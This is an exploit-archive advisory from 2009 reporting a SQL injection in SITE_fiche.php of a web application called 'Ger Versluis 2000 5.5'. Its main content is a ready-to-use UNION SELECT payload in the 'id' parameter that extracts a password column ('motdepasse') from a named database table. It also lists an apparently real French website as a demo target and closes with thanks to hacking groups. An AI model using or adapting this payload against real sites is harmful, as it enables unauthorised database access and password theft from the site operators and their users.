[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection Vulnerability
# Published : 2009-07-17
# Author : DeCo017
# Previous Title : Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns
# Next Title : iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------
Ger Versluis 2000 version 5.5 24 SITE_fiche.php SQL Injection Vulnerability
--------------------------------------------------------------------------
###################################################
[+] Author : DeCo017
[+] Email : 5s5[at]live[dot]fr
[+] Vulnerability : SQL injection
###################################################
Example:
http://www.site.com/path/SITE_fiche.php?id=-136++UNION SELECT 1,2,3,4,5,6,7,8,9,10,motdepasse,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95+from+IFI.CLASSCIMES_EVT_TMP/*
Demo :
http://www.ffme.fr/via-ferrata/SITE_fiche.php?id=136
Thanks for hack4love, rayo, saad, xweb, dbattack, x-sombrio, darkmaster and all 3asfh members
# www.Syue.com [2009-07-17]